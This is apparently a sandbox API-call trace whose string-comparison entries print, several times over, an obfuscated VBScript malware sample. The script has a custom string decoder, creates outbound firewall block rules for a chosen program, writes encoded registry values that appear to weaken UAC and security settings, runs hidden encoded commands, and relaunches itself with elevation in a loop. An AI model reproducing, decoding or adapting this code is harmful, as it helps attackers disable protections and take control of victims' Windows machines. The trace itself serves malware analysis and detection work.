bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0226.285] wcsncmp (_String1="heCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0226.285] wcsncmp (_String1="eCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.285] wcsncmp (_String1="CHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.285] wcsncmp (_String1="HAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 